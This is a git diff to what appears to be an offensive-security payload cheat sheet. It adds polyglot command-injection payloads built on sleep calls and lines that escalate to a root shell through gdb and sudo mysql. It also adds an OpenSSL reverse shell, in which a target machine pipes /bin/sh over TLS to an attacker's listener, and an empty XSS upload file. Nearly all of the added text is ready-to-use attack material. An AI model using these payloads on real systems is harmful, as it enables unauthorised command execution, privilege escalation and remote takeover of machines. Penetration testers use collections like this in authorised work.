diff --git a/Command injection/README.md b/Command injection/README.md index 39099b7..407373d 100644 --- a/Command injection/README.md +++ b/Command injection/README.md @@ -178,6 +178,15 @@ echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} ``` +```bash +/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ + +e.g: +echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ +echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/" +echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/' +``` + ## References * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index f600d49..d9b271d 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -188,8 +188,8 @@ permit nopass demo as root cmd vim The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. -> gdb -nx -ex '!sh' -ex quit -> sudo mysql -e '\! /bin/sh' +> gdb -nx -ex '!sh' -ex quit +> sudo mysql -e '\! /bin/sh' > strace -o /dev/null /bin/sh diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 1a95f08..1bc20a9 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -97,6 +97,15 @@ ncat 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash ``` +## OpenSSL + +```powershell +hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes +hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242 + +user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s +``` + ### Powershell ```powershell diff --git a/Upload insecure files/Extension HTML/xss.html b/Upload insecure files/Extension HTML/xss.html new file mode 100644 index 0000000..48d8f22 --- /dev/null +++ b/Upload insecure files/Extension HTML/xss.html @@ -0,0 +1 @@ + \ No newline at end of file